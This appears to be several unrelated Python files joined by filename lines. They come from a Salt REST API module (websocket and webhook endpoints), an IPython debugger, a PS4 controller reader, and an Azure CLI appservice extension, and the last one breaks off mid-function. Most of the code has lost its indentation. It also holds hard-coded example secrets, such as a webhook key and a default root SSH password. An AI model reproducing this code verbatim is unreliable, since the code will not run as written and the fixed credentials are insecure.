_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_token.on': True,
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:**
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: http
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
            var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
        The examples above show how to establish a websocket connection to Salt
        and activate real-time updates from Salt's event stream by signaling
        ``websocket client ready``.
'''
        # Pulling the session token from a URL param is a workaround for
        # browsers not supporting CORS in the EventSource API.
        if token:
            orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts)
stream = event.iter_events(full=True)
SaltInfo = event_processor.SaltInfo(handler)
while True:
data = stream.next()
if data:
                    try:  # workaround: decoding may fail; catch unicode errors below
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send('data: {0}\n\n'.format(
json.dumps(data)), False)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{0}"
.format(data))
time.sleep(0.1)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle async push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_token.on'] = False
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook -d foo='Foo!' -d bar='Bar!'
.. code-block:: http
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
foo=Foo&bar=Bar!
**Example response**:
.. code-block:: http
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: yaml
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
                      revision: {{ build.revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
raw_body = cherrypy.serving.request.raw_body
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_token.on': True,
'tools.salt_auth.on': True,
})
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
        .. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
return cherrypy.lib.static.serve_file(apiopts['app'])
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
for url, cls in self.url_map.items():
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
if 'app' in self.apiopts:
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'engine.timeout_monitor.on': self.apiopts.get(
'expire_responses', True),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.cpstats.on': self.apiopts.get('collect_stats', False),
'tools.cors_tool.on': True,
},
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
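# Illustrative sketch (not part of the upstream module): mounting the returned
# app directly for a quick local test. Real deployments go through salt-api,
# and ``opts`` here stands in for a loaded master configuration dict.
def _example_serve(opts):
    root, _apiopts, cpyopts = get_app(opts)
    cherrypy.quickstart(root, '/', cpyopts)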
|
debugger.py
|
import asyncio
import signal
import sys
import threading
from IPython.core.debugger import Pdb
from IPython.core.completer import IPCompleter
from .ptutils import IPythonPTCompleter
from .shortcuts import create_ipython_shortcuts, suspend_to_bg, cursor_in_leading_ws
from prompt_toolkit.enums import DEFAULT_BUFFER
from prompt_toolkit.filters import (Condition, has_focus, has_selection,
vi_insert_mode, emacs_insert_mode)
from prompt_toolkit.key_binding import KeyBindings
from prompt_toolkit.key_binding.bindings.completion import display_completions_like_readline
from pygments.token import Token
from prompt_toolkit.shortcuts.prompt import PromptSession
from prompt_toolkit.enums import EditingMode
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import __version__ as ptk_version
PTK3 = ptk_version.startswith('3.')
class TerminalPdb(Pdb):
"""Standalone IPython debugger."""
def __init__(self, *args, pt_session_options=None, **kwargs):
Pdb.__init__(self, *args, **kwargs)
self._ptcomp = None
self.pt_init(pt_session_options)
def pt_init(self, pt_session_options=None):
"""Initialize the prompt session and the prompt loop
and store them in self.pt_app and self.pt_loop.
Additional keyword arguments for the PromptSession class
can be specified in pt_session_options.
"""
if pt_session_options is None:
pt_session_options = {}
def get_prompt_tokens():
return [(Token.Prompt, self.prompt)]
if self._ptcomp is None:
compl = IPCompleter(shell=self.shell,
namespace={},
global_namespace={},
parent=self.shell,
)
# add a completer for all the do_ methods
methods_names = [m[3:] for m in dir(self) if m.startswith("do_")]
def gen_comp(self, text):
return [m for m in methods_names if m.startswith(text)]
import types
newcomp = types.MethodType(gen_comp, compl)
compl.custom_matchers.insert(0, newcomp)
# end add completer.
self._ptcomp = IPythonPTCompleter(compl)
options = dict(
message=(lambda: PygmentsTokens(get_prompt_tokens())),
editing_mode=getattr(EditingMode, self.shell.editing_mode.upper()),
key_bindings=create_ipython_shortcuts(self.shell),
history=self.shell.debugger_history,
completer=self._ptcomp,
enable_history_search=True,
mouse_support=self.shell.mouse_support,
complete_style=self.shell.pt_complete_style,
style=self.shell.style,
color_depth=self.shell.color_depth,
)
if not PTK3:
options['inputhook'] = self.shell.inputhook
options.update(pt_session_options)
self.pt_loop = asyncio.new_event_loop()
self.pt_app = PromptSession(**options)
def cmdloop(self, intro=None):
"""Repeatedly issue a prompt, accept input, parse an initial prefix
off the received input, and dispatch to action methods, passing them
the remainder of the line as argument.
        Override the same methods from cmd.Cmd to provide a prompt_toolkit replacement.
"""
if not self.use_rawinput:
raise ValueError('Sorry ipdb does not support use_rawinput=False')
# In order to make sure that prompt, which uses asyncio doesn't
# interfere with applications in which it's used, we always run the
# prompt itself in a different thread (we can't start an event loop
# within an event loop). This new thread won't have any event loop
# running, and here we run our prompt-loop.
self.preloop()
try:
if intro is not None:
self.intro = intro
if self.intro:
self.stdout.write(str(self.intro)+"\n")
stop = None
while not stop:
if self.cmdqueue:
line = self.cmdqueue.pop(0)
else:
self._ptcomp.ipy_completer.namespace = self.curframe_locals
self._ptcomp.ipy_completer.global_namespace = self.curframe.f_globals
# Run the prompt in a different thread.
line = ''
keyboard_interrupt = False
def in_thread():
nonlocal line, keyboard_interrupt
try:
line = self.pt_app.prompt()
except EOFError:
line = 'EOF'
except KeyboardInterrupt:
keyboard_interrupt = True
th = threading.Thread(target=in_thread)
th.start()
th.join()
if keyboard_interrupt:
raise KeyboardInterrupt
line = self.precmd(line)
stop = self.onecmd(line)
stop = self.postcmd(stop, line)
self.postloop()
except Exception:
raise
def set_trace(frame=None):
"""
Start debugging from `frame`.
If frame is not specified, debugging starts from caller's frame.
"""
TerminalPdb().set_trace(frame or sys._getframe().f_back)
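# Illustrative sketch (not part of the upstream module): dropping into the
# prompt_toolkit-based debugger from user code, analogous to pdb.set_trace().
def _example_usage():
    x = 41
    set_trace()  # opens a TerminalPdb prompt at this frame
    return x + 1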
if __name__ == '__main__':
import pdb
# IPython.core.debugger.Pdb.trace_dispatch shall not catch
# bdb.BdbQuit. When started through __main__ and an exception
# happened after hitting "c", this is needed in order to
# be able to quit the debugging session (see #9950).
old_trace_dispatch = pdb.Pdb.trace_dispatch
pdb.Pdb = TerminalPdb
pdb.Pdb.trace_dispatch = old_trace_dispatch
pdb.main()
|
controller.py
|
# This file presents an interface for interacting with the Playstation 4 Controller
# in Python. Simply plug your PS4 controller into your computer using USB and run this
# script!
#
# NOTE: I assume in this script that the only joystick plugged in is the PS4 controller.
# If this is not the case, you will need to change the class accordingly.
import pygame
from threading import Thread
class PS4Controller:
"""Class representing the PS4 controller. Pretty straightforward functionality."""
def __init__(self):
"""Initialize the joystick components."""
pygame.init()
pygame.joystick.init()
self.controller = pygame.joystick.Joystick(0)
self.controller.init()
self.axis_data = False
self.button_data = False
self.hat_data = False
# initialize the variable used to indicate if
# the thread should be stopped
self.stopped = False
# Threading-method
def start(self):
# Start the thread to read signals from the controller
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next signal from the controller
if not self.axis_data:
self.axis_data = {0: 0.0, 1: 0.0, 2: 0.0,
3: -1.0, 4: -1.0, 5: 0.0} # default
if not self.button_data:
self.button_data = {}
for i in range(self.controller.get_numbuttons()):
self.button_data[i] = False
if not self.hat_data:
self.hat_data = {}
for i in range(self.controller.get_numhats()):
self.hat_data[i] = (0, 0)
for event in pygame.event.get():
if event.type == pygame.JOYAXISMOTION:
self.axis_data[event.axis] = round(event.value, 2)
elif event.type == pygame.JOYBUTTONDOWN:
self.button_data[event.button] = True
elif event.type == pygame.JOYBUTTONUP:
self.button_data[event.button] = False
elif event.type == pygame.JOYHATMOTION:
self.hat_data[event.hat] = event.value
def read(self):
# return the signal most recently read
return self.button_data, self.axis_data, self.hat_data
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def get_button_command(button_data, controller):
"""Get button number from a ps4 controller.
Args:
      button_data: a mapping from button index to pressed state, with `controller.get_numbuttons()` entries
controller: pygame.joystick.Joystick()
Returns:
is_command: a boolean value
button_num: button number
Button number map:
0: SQUARE
1: X
2: CIRCLE
3: TRIANGLE
4: L1
5: R1
6: L2
7: R2
8: SHARE
      9: OPTIONS
10: LEFT ANALOG PRESS
11: RIGHT ANALOG PRESS
12: PS4 ON BUTTON
13: TOUCHPAD PRESS
"""
is_command = False
button_num = None
total_buttons = controller.get_numbuttons()
for num in range(total_buttons):
if button_data[num]:
is_command = True
button_num = num
break
return is_command, button_num
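# Illustrative sketch (not part of the original script): polling the controller
# in a loop and mapping presses to button numbers with get_button_command().
# The duration and sleep interval are arbitrary choices for the example.
def example_poll_buttons(duration=5.0):
    import time
    ps4 = PS4Controller()
    ps4.start()
    end = time.time() + duration
    while time.time() < end:
        buttons, _axes, _hats = ps4.read()
        if buttons:
            pressed, num = get_button_command(buttons, ps4.controller)
            if pressed:
                print("button %d pressed" % num)
        time.sleep(0.05)
    ps4.stop()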
if __name__ == "__main__":
ps4 = PS4Controller()
ps4.start()
ps4.read()
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
from knack.log import get_logger
from knack.util import CLIError
from azure.mgmt.web.models import (AppServicePlan, SkuDescription)
from azure.cli.command_modules.appservice.custom import (
show_webapp,
_get_site_credential,
_get_scm_url,
list_publish_profiles,
get_site_configs,
update_container_settings,
create_webapp,
get_sku_name,
_check_zip_deployment_status)
from azure.cli.command_modules.appservice._appservice_utils import _generic_site_operation
from azure.cli.command_modules.appservice._create_util import (
should_create_new_rg,
create_resource_group,
web_client_factory,
should_create_new_app
)
from .acr_util import (queue_acr_build, generate_img_name)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals,too-many-statements,too-many-branches,line-too-long,import-outside-toplevel
def create_deploy_container_app(cmd, name, source_location=None, docker_custom_image_name=None, dryrun=False, registry_rg=None, registry_name=None): # pylint: disable=too-many-statements
import os
import json
if not source_location:
# the dockerfile is expected to be in the current directory the command is running from
source_location = os.getcwd()
client = web_client_factory(cmd.cli_ctx)
_create_new_rg = True
_create_new_asp = True
_create_new_app = True
_create_acr_img = True
if docker_custom_image_name:
logger.warning('Image will be pulled from DockerHub')
img_name = docker_custom_image_name
_create_acr_img = False
else:
logger.warning('Source code will be uploaded and built in Azure Container Registry')
if not registry_name:
raise CLIError("--registry-name not specified")
if not registry_rg:
raise CLIError("--registry-rg not specified")
img_name = generate_img_name(source_location)
sku = 'P1V2'
full_sku = get_sku_name(sku)
location = 'Central US'
loc_name = 'centralus'
asp = "appsvc_asp_linux_{}".format(loc_name)
rg_name = "appsvc_rg_linux_{}".format(loc_name)
# Resource group: check if default RG is set
_create_new_rg = should_create_new_rg(cmd, rg_name, True)
rg_str = "{}".format(rg_name)
dry_run_str = r""" {
"name" : "%s",
"serverfarm" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"location" : "%s"
}
""" % (name, asp, rg_str, full_sku, location)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_acr_img:
logger.warning("Starting ACR build")
queue_acr_build(cmd, registry_rg, registry_name, img_name, source_location)
logger.warning("ACR build done. Deploying web app.")
# create RG if the RG doesn't already exist
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, location)
logger.warning("Resource group creation complete")
_create_new_asp = True
else:
logger.warning("Resource group '%s' already exists.", rg_name)
_create_new_asp = _should_create_new_asp(cmd, rg_name, asp, location)
# create new ASP if an existing one cannot be used
if _create_new_asp:
logger.warning("Creating App service plan '%s' ...", asp)
sku_def = SkuDescription(tier=full_sku, name=sku, capacity=1)
plan_def = AppServicePlan(location=loc_name, app_service_plan_name=asp,
sku=sku_def, reserved=True)
client.app_service_plans.create_or_update(rg_name, asp, plan_def)
logger.warning("App service plan creation complete")
_create_new_app = True
else:
logger.warning("App service plan '%s' already exists.", asp)
_create_new_app = should_create_new_app(cmd, rg_name, name)
# create the app
if _create_new_app:
logger.warning("Creating app '%s' ....", name)
# TODO: Deploy without container params and update separately instead?
# deployment_container_image_name=docker_custom_image_name)
create_webapp(cmd, rg_name, name, asp, deployment_container_image_name=img_name)
logger.warning("Webapp creation complete")
else:
logger.warning("App '%s' already exists", name)
# Set up the container
if _create_acr_img:
logger.warning("Configuring ACR container settings.")
registry_url = 'https://' + registry_name + '.azurecr.io'
acr_img_name = registry_name + '.azurecr.io/' + img_name
update_container_settings(cmd, rg_name, name, registry_url, acr_img_name)
logger.warning("All done.")
return create_json
def _ping_scm_site(cmd, resource_group, name):
# wakeup kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
requests.get(scm_url + '/api/settings', headers=authorization)
def start_scan(cmd, resource_group_name, name, timeout="", slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
start_scan_url = scm_url + '/api/scan/start?timeout=' + timeout
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(start_scan_url, headers=authorization)
return response.json()
def get_scan_result(cmd, resource_group_name, name, scan_id, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
scan_result_url = scm_url + '/api/scan/' + scan_id + '/result'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(scan_result_url, headers=authorization)
return response.json()
def track_scan(cmd, resource_group_name, name, scan_id, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
scan_result_url = scm_url + '/api/scan/' + scan_id + '/track'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(scan_result_url, headers=authorization)
return response.json()
def get_all_scan_result(cmd, resource_group_name, name, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
scan_result_url = scm_url + '/api/scan/results'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
response = requests.get(scan_result_url, headers=authorization)
return response.json()
def stop_scan(cmd, resource_group_name, name, slot=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
import requests
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
stop_scan_url = scm_url + '/api/scan/stop'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['content-type'] = 'application/octet-stream'
requests.delete(stop_scan_url, headers=authorization)
def _get_app_url(cmd, rg_name, app_name):
site = _generic_site_operation(cmd.cli_ctx, rg_name, app_name, 'get')
return "https://" + site.enabled_host_names[0]
def _check_for_ready_tunnel(remote_debugging, tunnel_server):
default_port = tunnel_server.is_port_set_to_default()
if default_port is not remote_debugging:
return True
return False
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None):
logger.warning("remote-connection is deprecated and moving to cli-core, use `webapp create-remote-connection`")
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
logger.error("Only Linux App Service Plans supported, Found a Windows App Service Plan")
return
import time
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
user_name = next(p['userName'] for p in profiles)
user_password = next(p['userPWD'] for p in profiles)
import threading
from .tunnel import TunnelServer
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
host_name = name
if slot is not None:
host_name += "-" + slot
tunnel_server = TunnelServer('', port, host_name, user_name, user_password)
config = get_site_configs(cmd, resource_group_name, name, slot)
_ping_scm_site(cmd, resource_group_name, name)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server, config.remote_debugging_enabled))
t.daemon = True
t.start()
# Wait indefinitely for CTRL-C
while True:
time.sleep(5)
def _start_tunnel(tunnel_server, remote_debugging_enabled):
import time
if not _check_for_ready_tunnel(remote_debugging_enabled, tunnel_server):
logger.warning('Tunnel is not ready yet, please wait (may take up to 1 minute)')
while True:
time.sleep(1)
logger.warning('.')
if _check_for_ready_tunnel(remote_debugging_enabled, tunnel_server):
break
if remote_debugging_enabled is False:
logger.warning('SSH is available { username: root, password: Docker! }')
tunnel_server.start_server()
def _should_create_new_asp(cmd, rg_name, asp_name, location):
# get all appservice plans from RG
client = web_client_factory(cmd.cli_ctx)
for item in list(client.app_service_plans.list_by_resource_group(rg_name)):
if (item.name.lower() == asp_name.lower() and
item.location.replace(" ", "").lower() == location or
item.location == location):
return False
return True
# OneDeploy
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams(object):
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _validate_onedeploy_params(params):
if params.src_path and params.src_url:
raise CLIError('Only one of --src-path and --src-url can be specified')
if not params.src_path and not params.src_url:
raise CLIError('Either of --src-path or --src-url must be specified')
if params.src_url and not params.artifact_type:
raise CLIError('Deployment type is mandatory when deploying from URLs. Use --type')
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
from azure.cli.core.util import (
get_az_user_agent,
)
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name, params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
